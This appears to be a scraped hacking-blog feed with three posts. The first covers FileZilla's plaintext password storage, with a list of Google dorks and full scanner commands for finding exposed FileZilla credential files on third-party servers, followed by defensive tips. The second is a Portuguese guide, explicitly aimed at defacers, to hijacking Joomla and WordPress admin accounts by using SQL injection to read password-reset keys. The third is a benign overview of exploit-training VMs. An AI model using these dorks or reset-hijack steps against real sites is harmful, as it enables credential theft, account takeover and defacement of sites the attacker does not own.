<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhN9d2l3D9-dbqBqWN900t9Zh4mmRCqTl3XKuPbWKAxMItwfjuxf1bbfu_OQHFv_-RBCT8ltx7oqQdk5oYuSSPYuNpZSXFOiXhzpLH0LS7g2OVCQ6HYFHukEU5VoU0Uax2MAA3PCt6pq4p2/s1600/filezilla-configuration-files.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="FileZilla configuration files FileZilla is a cross-platform application. That’s why it stores its settings in platform-neutral XML files." border="0" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhN9d2l3D9-dbqBqWN900t9Zh4mmRCqTl3XKuPbWKAxMItwfjuxf1bbfu_OQHFv_-RBCT8ltx7oqQdk5oYuSSPYuNpZSXFOiXhzpLH0LS7g2OVCQ6HYFHukEU5VoU0Uax2MAA3PCt6pq4p2/s640/filezilla-configuration-files.png" title="FileZilla configuration files FileZilla is a cross-platform application. That’s why it stores its settings in platform-neutral XML files." width="640" /></a></div>
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;">sitemanager.xml </span></b><br />
The XML files are readable for reading with access data, As you can see, everything is stored in plain text, including the password.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOD1JThrFaGmw_RPPvB6oMxQ1ilvBmlNZAWlrLZcbxYZcegb8kcktql1zsql4LmzDslJHf52MrMmOl8mjwG_RzpxaOrHeWToZFLIssZPM7mWa6urvQ7NqhGgqbasC9nLQrANW7djYwCJ_8/s1600/sitemanager-xml.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="sitemanager.xml The XML files are readable for reading with access data, As you can see, everything is stored in plain text, including the password." border="0" height="264" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOD1JThrFaGmw_RPPvB6oMxQ1ilvBmlNZAWlrLZcbxYZcegb8kcktql1zsql4LmzDslJHf52MrMmOl8mjwG_RzpxaOrHeWToZFLIssZPM7mWa6urvQ7NqhGgqbasC9nLQrANW7djYwCJ_8/s320/sitemanager-xml.gif" title="sitemanager.xml The XML files are readable for reading with access data, As you can see, everything is stored in plain text, including the password." width="320" /></a></div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>filezilla.xml</b></span><br />
The filezilla.xml file follow the same example <b>sitemanager.xml</b>, It starts with naming <span style="font-family: Courier New, Courier, monospace;"><LastServer></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYU46iKv_-S-Z5A297p2dhG74iLHrARSN6xwCA47ifza2vaaDyKBBAfaAq8vyC-2i-Gh7s74WIzd68WTxs-_RSC7yDrm4kVsyqOfRFLeAE4szVXsKu1xcn-I2CPSmRYcw2R-GcsB2LWkIF/s1600/filezilla-xml.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="filezilla.xml The filezilla.xml file follow the same example sitemanager.xml, It starts with naming <LastServer>" border="0" height="181" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYU46iKv_-S-Z5A297p2dhG74iLHrARSN6xwCA47ifza2vaaDyKBBAfaAq8vyC-2i-Gh7s74WIzd68WTxs-_RSC7yDrm4kVsyqOfRFLeAE4szVXsKu1xcn-I2CPSmRYcw2R-GcsB2LWkIF/s320/filezilla-xml.gif" title="filezilla.xml The filezilla.xml file follow the same example sitemanager.xml, It starts with naming <LastServer>" width="320" /></a></div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>Quick connect </b></span><br />
QuickConnect lets you connect to servers without adding them to your administrative panel. when instaciado a fast connection it is added in <b>recentservers.xml</b> file.<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>Danger?</b></span><br />
Yes the same way that you can read these files. Malicious applications can do the same, and can be read also on web servers.<br />
ex:<br />
www.target.com.br/folder/<b><span style="font-family: Courier New, Courier, monospace;">{file.xml}</span></b><br />
www.target.com.br/microsite/geo243/<span style="font-family: Courier New, Courier, monospace;"><b>FileZilla.xml </b></span>www.target.com.br/149224/prg/programok/Total%20Commander/FileZilla/<span style="font-family: Courier New, Courier, monospace;"><b>recentservers.xml</b></span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Other files:</b></span><br />
<ol>
<li><span style="font-family: Courier New, Courier, monospace;">sitemanager.xml</span></li>
<li><span style="font-family: Courier New, Courier, monospace;">recentservers.xml</span></li>
<li><span style="font-family: Courier New, Courier, monospace;">filezilla.xml</span></li>
<li><span style="font-family: Courier New, Courier, monospace;">bookmarks.xml</span></li>
<li><span style="font-family: Courier New, Courier, monospace;">filters.xml</span></li>
<li><span style="font-family: Courier New, Courier, monospace;">layout.xml</span></li>
<li><span style="font-family: Courier New, Courier, monospace;">queue.xml</span></li>
</ol>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>Looking for vulnerable servers</b></span><br />
Now let's use the <a href="http://blog.inurl.com.br/search/label/INURLBR" target="_blank">inurlbr</a> tool to search sites with such breach and confirm such information.<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Download tool: </span></b><br />
<a href="https://github.com/googleinurl/SCANNER-INURLBR" target="_blank">https://github.com/googleinurl/SCANNER-INURLBR</a><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Setting command:</b></span><br />
using search engines..<br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">SET DORK:</span></b><br />
<b>Choose your dork search</b><br />
<br />
<ul>
<li><span style="font-family: 'Courier New', Courier, monospace;">"\FileZilla\" ext:xml</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">inurl:"\FileZilla\" & inurl:sitemanager.xml -github -sourceforge</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">inurl:"\FileZilla\" & inurl:recentservers.xml -github -sourceforge</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">inurl:"\FileZilla\" & inurl:filezilla.xml -github -sourceforge</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">inurl:"\FileZilla\" & inurl:bookmarks.xml -github -sourceforge</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">inurl:"\FileZilla\" & inurl:filters.xml -github -sourceforge</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">inurl:"\FileZilla\" & inurl:layout.xml -github -sourceforge</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">inurl:"\FileZilla\" & inurl:queue.xml -github -sourceforge</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">inurl:sitemanager.xml & ext:xml & -github -sourceforge</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">inurl:recentservers.xml & ext:xml & -github -sourceforge</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">inurl:filezilla.xml & ext:xml & -github -sourceforge</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">inurl:bookmarks.xml & ext:xml & -github -sourceforge</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">inurl:filters.xml & ext:xml & -github -sourceforge</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">inurl:layout.xml & ext:xml & -github -sourceforge</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">inurl:queue.xml & ext:xml & -github -sourceforge</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">inurl:"\FileZilla\" & inurl:(sitemanager.xml | recentservers.xml | filezilla.xml | filters.xml | bookmarks.xml | layout.xml | queue.xml) ext:xml -github -sourceforge</span></li>
</ul>
<span style="color: red; font-family: Courier New, Courier, monospace;"><b>--dork</b> 'YOU_DORK'</span><br />
<b>- Setting: </b><span style="color: red; font-family: Courier New, Courier, monospace;"><b>--dork</b> '"\FileZilla\" ext:xml'</span><br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">SET FILE OUTPUT:</span></b><br />
<b>- Setting: </b><span style="color: red; font-family: Courier New, Courier, monospace;"><b>-s</b> filezilla.txt</span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>SET TIPE VALIDATION: </b></span><br />
<b>- Setting: </b><span style="color: red; font-family: Courier New, Courier, monospace;"><b>-t</b> 2 </span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"> 2 The second type tries to valid the error defined by: </span><span style="color: red; font-family: Courier New, Courier, monospace;"><i><b>-a</b> 'VALUE_INSIDE_THE _TARGET'</i></span><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"> It also establishes connection with the exploit through the get method.</span><br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span></b>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>SET STRING VALIDATION:</b></span><br />
Specify the string that will be used on the search script:<br />
Example:<span style="font-family: Courier New, Courier, monospace;"> <span style="color: red;"><b>-a</b> {string}</span></span><br />
Usage: <span style="font-family: Courier New, Courier, monospace;"> <span style="color: red;"><b>-a</b> '<title>hello world</title>'</span></span><br />
If specific value is found in the target he is considered vulnerable.<br />
<b>- </b><b>Setting: </b> <span style="color: red; font-family: Courier New, Courier, monospace;"><b>-a</b> '<FileZilla3>'</span><br />
<i>All filezilla file there is a primary tag called <FileZilla3>. It is trough this that we will validate.</i><br />
<b>Ex</b><i>:</i><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8sLz_-r77ytw1BVa6kSoBetZb6Ddat9ZkW4yz03Aq6nGyg6rQxj6NkThPTrNYZaOH4iLKN13AJ18JZo2QazEUe9xcUcguiqm8U2B0GFXW_2o7fJYbPPdYqa-VFJrWzCgFFv7ECENTF7J-/s1600/Captura+de+tela+de+2015-08-02+20%253A41%253A59.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="All filezilla file there is a primary tag called <FileZilla3>. It is trough this that we will validate. Ex:" border="0" height="356" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8sLz_-r77ytw1BVa6kSoBetZb6Ddat9ZkW4yz03Aq6nGyg6rQxj6NkThPTrNYZaOH4iLKN13AJ18JZo2QazEUe9xcUcguiqm8U2B0GFXW_2o7fJYbPPdYqa-VFJrWzCgFFv7ECENTF7J-/s640/Captura+de+tela+de+2015-08-02+20%253A41%253A59.png" title="All filezilla file there is a primary tag called <FileZilla3>. It is trough this that we will validate. Ex:" width="640" /></a></div>
<i><br /></i>
<i><br /></i>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;">Full command - </span></b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>using search engines</b></span><b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;">:</span></b><br />
<span style="color: red; font-family: Courier New, Courier, monospace;">php inurlbr.php </span><b style="color: red; font-family: 'Courier New', Courier, monospace;">--dork</b><span style="color: red; font-family: Courier New, Courier, monospace;"> '"\FileZilla\" ext:xml' </span><b style="color: red; font-family: 'Courier New', Courier, monospace;">-s</b><span style="color: red; font-family: 'Courier New', Courier, monospace;"> filezilla.txt </span><b style="color: red; font-family: 'Courier New', Courier, monospace;">-t</b><span style="color: red; font-family: 'Courier New', Courier, monospace;"> 2</span><span style="color: red; font-family: 'Courier New', Courier, monospace;"> </span><b style="color: red; font-family: 'Courier New', Courier, monospace;">-a</b><span style="color: red; font-family: 'Courier New', Courier, monospace;"> '<FileZilla3></span><span style="color: red; font-family: 'Courier New', Courier, monospace;">'</span><br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">OR SCANNER DORKING-FILE:</span></b><br />
<span style="color: red; font-family: Courier New, Courier, monospace;">php inurlbr.php </span><b style="color: red; font-family: 'Courier New', Courier, monospace;">--dork-file</b><span style="color: red; font-family: Courier New, Courier, monospace;"> dorks.txt </span><b style="color: red; font-family: 'Courier New', Courier, monospace;">-s</b><span style="color: red; font-family: 'Courier New', Courier, monospace;"> filezilla.txt </span><b style="color: red; font-family: 'Courier New', Courier, monospace;">-t</b><span style="color: red; font-family: 'Courier New', Courier, monospace;"> 2</span><span style="color: red; font-family: 'Courier New', Courier, monospace;"> </span><b style="color: red; font-family: 'Courier New', Courier, monospace;">-a</b><span style="color: red; font-family: 'Courier New', Courier, monospace;"> '<FileZilla3></span><span style="color: red; font-family: 'Courier New', Courier, monospace;">'</span><br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">OUTPUT PRINT:</span></b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpw-v-NxKew0VjWqYgwCK5us0NkiqJ0rK8e4oCChsld4q8xNnEtPHwxHVlsLSHhgMACiE-tHBXibDdanePY29ZozanWR5NveCWgAPrIww4YG8HzIeU-8fwT8bIr2KM2nYF8SxgVjURwvNh/s1600/Captura+de+tela+de+2015-08-02+21%253A11%253A26.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Full command - using search engines: php inurlbr.php --dork '"\FileZilla\" ext:xml' -s filezilla.txt -t 2 -a '<FileZilla3>' OUTPUT PRINT:" border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpw-v-NxKew0VjWqYgwCK5us0NkiqJ0rK8e4oCChsld4q8xNnEtPHwxHVlsLSHhgMACiE-tHBXibDdanePY29ZozanWR5NveCWgAPrIww4YG8HzIeU-8fwT8bIr2KM2nYF8SxgVjURwvNh/s640/Captura+de+tela+de+2015-08-02+21%253A11%253A26.png" title="Full command - using search engines: php inurlbr.php --dork '"\FileZilla\" ext:xml' -s filezilla.txt -t 2 -a '<FileZilla3>' OUTPUT PRINT:" width="640" /></a></div>
<br />
<br />
<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>Using FileZilla the safe way</b></span><br />
<br />
FileZilla is a great FTP client and I use it myself. But since it doesn’t protect your FTP credentials, you should protect them yourselves. Here is what you can do:<br />
<br />
1. Don’t use the “Normal” logon type. There are the “Ask for password” and the “Interactive” types that won’t save your passwords on disk. So malware simply won’t be able to get enough information from FileZilla configuration files to hack your sites.<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Pros</b></span><br />
Malware cannot steal your FTP credential from configuration files.<br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Cons</span></b><br />
You’ll have to enter your password every time you connect to your site.<br />
It won’t save you from more sophisticated spyware such as keyloggers and traffic sniffers. But I hope this sort of trojans can be better detected by you antivirus tools since they need to hook known system functions. To protect yourself from traffic sniffers, always use SFTP instead of FTP (if possible).<br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">2. Hosts trick.</span></b> If you manage multiple web sites, interactive logon types may be really inconvenient. There is a trick that can let you use the “Normal” logon type in a more secure manner. You should create aliases of your sites’ addresses in the “hosts” file (on Windows, you can find it in <span style="font-family: Courier New, Courier, monospace;">C:\WINDOWS\system32\drivers\etc\</span>).<br />
<br />
For example you have a site “example.com” with an IP-address "208.xxx.188.166".<br />
To create an alias you need to add the following line into the hosts file:<br />
<br />
<span style="font-family: Courier New, Courier, monospace;">208.xxx.188.166 my_example</span><br />
<br />
<b>"my_example" </b>will work the same way as “example.com” when you use it on your computer.<br />
However, on other computers it won’t make any sense. Now use this alias in <a href="http://blog.inurl.com.br/search/label/ftp" target="_blank">FTP</a> connection settings instead of “example.com”. <br />
If hackers manage to steal your FTP credentials, all they’ll have will be: (<span style="font-family: Courier New, Courier, monospace;">host: my_example, user: unmask, password: parasites</span>) – the username/password pair is valid, but the host name doesn’t make any sense to them. It’s like having a key and not knowing where the door is.<br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Pros</span></b><br />
Once you have added new aliases to the hosts file and to FileZilla Site Manager, you can enjoy the ease of one-click connections.<br />
Cons<br />
<br />
This trick will only work as long as malware steals FTP credentials from configuration files verbatim (and I have proofs that at least some malware steal the data verbatim). If they only add a simple check that converts host names to IP-addresses before sending the credentials to their central database, the trick will be useless. This trick is better than no protection at all, but you should not count on it.<br />
You’ll need to update the hosts file if IP-addresses change.<br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">3. Public Key Authentication.</span></b> If your hosting plan included SSH (secure shell), you can use FileZilla in SFTP mode. One of convenient SSH features is public key authentication. And FileZilla supports this type of authorization (I didn’t use it myself, but at least have seen the UI in the “Settings” dialog). FileZilla recognizes PuTTY’s Pageant, so the configuration should be easy if you already use PuTTY for SSH.<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Pros</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">Secure one-click connections.</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Cons</b></span><br />
<br />
This authentication method will only work if your hosting plan includes SSH/SFTP. Unfortunately, this option is rearly included into shared hosting plans.<br />
Creating the keys and configuring FileZilla to use them is not a trivial process.<br />
You might still have to enter a pass phrase when adding keys to the Pageant.<br />
Other FTP programs<br />
<br />
In this article I reviewed FileZilla only because it’s a popular FTP client that I have on my computer and it was very easy to demonstrate how little it does to protect users’ FTP credentials. However the same concerns apply to all other programs that have FTP functions: classical FTP clients, web page editors, file managers. Popular applications like DreamWeaver, CuteFTP, Total Commander, etc. account for majority of FTP credentials leaks.<br />
<br />
<b>Solution Source:</b> <a href="http://blog.unmaskparasites.com/2009/09/01/beware-filezilla-doesnt-protect-your-ftp-passwords/" target="_blank">http://blog.unmaskparasites.com/2009/09/01/beware-filezilla-doesnt-protect-your-ftp-passwords/</a><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>Referencias:</b></span><br />
<a href="http://seclists.org/fulldisclosure/2008/Apr/508" target="_blank">http://seclists.org/fulldisclosure/2008/Apr/508</a><br />
<a href="http://blog.unmaskparasites.com/2009/09/01/beware-filezilla-doesnt-protect-your-ftp-passwords/" target="_blank">http://blog.unmaskparasites.com/2009/09/01/beware-filezilla-doesnt-protect-your-ftp-passwords/</a><br />
<a href="http://bl0wj0bb3r.blogspot.com.br/2015/08/d3lphi-filezilla-password-stealer.html" target="_blank">http://bl0wj0bb3r.blogspot.com.br/2015/08/d3lphi-filezilla-password-stealer.html</a><br />
<a href="http://unsharptech.com/2008/05/20/filezilla-ftp-passwords-stored-in-plaintext/" target="_blank">http://unsharptech.com/2008/05/20/filezilla-ftp-passwords-stored-in-plaintext/</a>InurlBRhttp://www.blogger.com/profile/12688503833321390298noreply@blogger.com6tag:blogger.com,1999:blog-5670232360751087799.post-71911731110682014512015-07-30T21:45:00.000-03:002015-07-30T22:03:47.479-03:00Resetando senha WORDPRESS/JOOMLA via SQL injection <div class="separator" style="clear: both; text-align: center;">
<a href="http://www.w3chacking.com/wp-content/uploads/2012/11/w3ctrlhacking-sql-injection-1140x600.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="[0x00] Introdução Bom vamos lá esse artigo é bem simples porem bem útil para gurizada que curte um defacement porém não possui muito conhecimento e que passam um bom tempo ate conseguir "quebrar" um hash dessas CMS." border="0" src="http://www.w3chacking.com/wp-content/uploads/2012/11/w3ctrlhacking-sql-injection-1140x600.jpg" height="336" title="[0x00] Introdução Bom vamos lá esse artigo é bem simples porem bem útil para gurizada que curte um defacement porém não possui muito conhecimento e que passam um bom tempo ate conseguir "quebrar" um hash dessas CMS." width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<b></b><br />
<div style="text-align: center;">
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b><span style="font-size: large;">[0x00]</span></b> <b><span style="color: red; font-size: large;">Introdução</span></b></span></b></div>
<b>
</b>
<br />
<div style="text-align: left;">
Bom vamos lá esse artigo é bem simples porem bem útil para gurizada que curte um defacement porém não possui muito conhecimento e que passam um bom tempo ate conseguir "quebrar" um hash dessas CMS.</div>
<b>
</b>
<div style="text-align: left;">
<b><b></b><br /></b>
<div style="text-align: center;">
<b><b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b><span style="font-size: large;">[0x01]</span></b> <span style="color: red; font-size: large;">Conceito Joomla</span></span></b></b></div>
<b><b>
</b></b></div>
<b>
</b><br />
<div style="text-align: left;">
Não sei bem se podemos chamar de conceito porém esse termo se encaixa bem e se não me falha a memoria já vi um artigo similar em algum lugar só não me recordo o autor.<br />
<br /></div>
<b>[<span style="color: blue;">0x01a</span>] A Hash </b><br />
<div>
A hash utilizada pelo Joomla é uma especie de MD5 que divide a senha em partes apos o : se o numero de caracteres for impar sera acrescentado um a mais na primeira md5.<br />
<b><br /></b></div>
<div>
<b>[<span style="color: blue;">0x01b</span>] Exemplo:</b><br />
<span style="font-family: Courier New, Courier, monospace;">147c6577fd36d90147c4ee3a5a0cceaa<b>:</b><span style="color: red;">sWTeBV3KGXeCtb6ivBFXKBRhMIJE4O0</span></span> a parte em preto corresponde a 0X4 e a parte destacada em vermelho<span style="color: red;"> h4x</span></div>
<div>
<b><b></b></b><br />
<div style="text-align: center;">
<b><b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b><span style="font-size: large;">[0x02]</span></b> <span style="color: red; font-size: large;">Injeção </span></span></b></b></div>
<b><b>
</b></b>
<br />
<div style="text-align: left;">
É bem semelhante a uma injeção de SQL normal apenas mudamos as tabela e colunas que vão ser exploradas em um caso normal estaríamos atras de colunas responsável pelo armazenamento do nome de usuário e senha porém dessa vez buscaremos a tabela responsável pelos códigos de ativação e email.<br />
<br /></div>
<div style="text-align: left;">
<b>[<span style="color: blue;">0x02b</span>] Tabela alvo</b></div>
<div style="text-align: left;">
O alvo é _user o nome pode variar porem em 90% dos casos sempre possui _user e vamos pegar as colunas email e activation.</div>
<div style="text-align: left;">
Pegaremos o email e o introduziremos em <span style="color: blue;"><span style="font-family: Courier New, Courier, monospace;"><b>alvo.ru/index.php?option=com_user&view=reset</b></span> </span>apos isso é só colocar o código pego na coluna activation e será possível escolher uma nova senha.</div>
<div style="text-align: left;">
<b></b></div>
<div>
<b></b><br />
<div style="text-align: center;">
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b><span style="font-size: large;">[0x03]</span></b> <span style="color: red; font-size: large;">Conceito Wordpress</span></span></b></div>
<b>
</b>
<br />
<div style="text-align: center;">
<i>Não muda muita coisa da injeção em joomla apenas possui um tipo de hash ate o momento "desconhecida" </i></div>
<div style="font-weight: bold; text-align: center;">
<br /></div>
<div style="font-weight: bold; text-align: left;">
<b>[<span style="color: blue;">0x03a</span>]</b> Tabela alvo e colunas</div>
<div style="text-align: left;">
<b> </b> a tabela alvo é <b><span style="font-family: Courier New, Courier, monospace;">wp_users</span></b> e as colunas são <b><span style="font-family: Courier New, Courier, monospace;">user_login user_activation_key</span></b>.<br />
<br /></div>
<div style="font-weight: bold; text-align: left;">
<b>[<span style="color: blue;">0x03b</span>] Resetando </b></div>
<div>
<b style="font-weight: bold;"> </b>é bem semelhante ao joomla apenas muda o caminho por trata se de CMS diferentes primeiro entraremos em <span style="color: blue; font-family: Courier New, Courier, monospace;"><b>alvo.ru/</b></span><span style="color: blue;"><b><span style="font-family: Courier New, Courier, monospace;">wp-login.php?action=lostpassword</span></b> </span>e colocaremos o usuário que desejamos mudar a senha usuário obtido na user_login apos isso entraremos em <span style="font-family: Courier New, Courier, monospace;"><b>/wp-login.php?action=rp&key=<span style="color: blue;">l33ts</span>&login=<span style="color: red;">h4x0r</span>.</b></span></div>
</div>
</div>
<div>
<b></b><br />
<div style="text-align: center;">
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b><span style="font-size: large;">[0x04]</span></b> <span style="color: red; font-size: large;">Explicação Wordpress</span></span></b></div>
<b>
</b>
<br />
<div style="text-align: center;">
Bom creio que todos tenham entendido a parte l33ts e <span style="color: red;"><b>h4x0r</b></span> mas para os desatentos onde possui l33ts na url você introduz o código correspondente obtido em <span style="color: red;"><b><span style="font-family: Courier New, Courier, monospace;">user_activation_key</span></b> </span>e onde localiza se H4x0r é o usuário obtido em user_login.</div>
<b>
</b></div>
<div>
<b><br /></b></div>
<div>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;">Solução ?</span><br />Mantenha seu CMS sempre atualizado e informe-se sobre </b><b>novas </b><b>falhas .</b></div>
0x4h4xhttp://www.blogger.com/profile/15701173647037587709noreply@blogger.com2tag:blogger.com,1999:blog-5670232360751087799.post-21951727521538501212015-07-30T20:23:00.002-03:002015-07-30T20:37:34.868-03:00Exploit exercises<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipTGA97Ec0_BqwTyoN68X0Glc7oWCU8EbhC3tX13ipJYoEe6wh5O8xh87H-S1-puEYfP5NF4UFE8SGTMBEz5SPLV-_RGi9bdXy0BUh6-hxKZWJnNVgOyk25tOfUDIUXACm43K21uzSXADt/s1600/hacker-id-theft-dreamstime_l_13516127.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt=" O Exploit exercises é uma sequencia de desafios e documentações para auxiliar a garotada a obter conhecimento sobre diversas fases do pentest." border="0" height="402" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipTGA97Ec0_BqwTyoN68X0Glc7oWCU8EbhC3tX13ipJYoEe6wh5O8xh87H-S1-puEYfP5NF4UFE8SGTMBEz5SPLV-_RGi9bdXy0BUh6-hxKZWJnNVgOyk25tOfUDIUXACm43K21uzSXADt/s640/hacker-id-theft-dreamstime_l_13516127.jpg" title=" O Exploit exercises é uma sequencia de desafios e documentações para auxiliar a garotada a obter conhecimento sobre diversas fases do pentest." width="640" /></a></div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b><br /></b></span>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b><br /></b></span>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>[0x00] <span style="color: red;">Introdução </span></b></span><br />
<div>
<span style="color: red; font-weight: bold;"><span style="font-size: large;"> </span> </span>O<span style="color: red;"> </span>Exploit exercises é uma sequencia de desafios e documentações para auxiliar a garotada a obter conhecimento sobre diversas fases do pentest.<br />
<br /></div>
<div>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span style="font-size: large;">[</span><span style="font-size: large;">0x01</span><span style="font-size: large;">] </span><span style="color: red; font-size: large;">Como funciona ?</span></span></b></div>
<div>
<b> </b>O desafio é elaborado utilizando diversas VM (Virtuais Machines) e uma vasta gama de documentações e vídeo aulas.<br />
<br /></div>
<div>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span style="font-size: large;">[</span><span style="font-size: large;">0x02</span><span style="font-size: large;">] </span><span style="color: red;"><span style="font-size: large;">Níveis</span></span></span></b></div>
<div>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"> [0x02a] <span style="color: blue;">Nebula</span></span></b></div>
<b> </b>O módulo Nebula inicialmente introduz problemas como buffer overflows escalação de privilegio em ambiente linux o nebula é ideal para iniciantes em escalação de privilegio.<br />
<br />
<div>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"> [0x02b] <span style="color: blue;">Protostar </span></span></b></div>
<div>
<span style="color: blue;"> </span>O módulo Protostar é bem semelhante ao nebula o introduz a ordem de byte ao manuseio de sockets estouro de pilha sequencia de formato e a programação de rede.<br />
<br /></div>
<div>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"> [0x02c]</span><span style="color: blue;"><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"> Fusion</span> </span></b></div>
<div>
O módulo Fusion nos introduz basicamente a criptografia e a variedade de protocolos.<br />
<br /></div>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b> </b><b>[0x02d] <span style="color: blue;">Main Sequence</span></b></span></div>
<div>
<span style="color: blue;"><b> </b> </span>Modulo Main Sequence onde as coisas começam a ficar serias esse eu considero como um dos módulos mais decisivos pois o introduz a uma sequencia de testes utilizando ferramentas focadas em pentest como Metasploit SQLMAP além de analises binarias engenharia reversa analise de criptografia básica protocolos de rede além de pentest focado em WEB.<br />
<br /></div>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b> </b><b>[0x02e] <span style="color: blue;">Cloudroad</span></b></span></div>
<div>
<span style="color: blue; font-weight: bold;"> </span>Módulo final cloudroad era o nome do capture the flag realizado durante a ruxcon 2014 jogue e "seja" membro de uma organização ilegal que contrata espionagem empresarial escreva exploits e pratique engenharia reversa e muito mais infelizmente esse módulo ainda não encontra se disponível.</div>
<div>
<b><br /></b></div>
<div>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span style="font-size: large;">[</span><span style="font-size: large;">0x03</span><span style="font-size: large;">] <span style="color: red;">Considerações finais </span></span></span></b></div>
<div>
<br /></div>
<div>
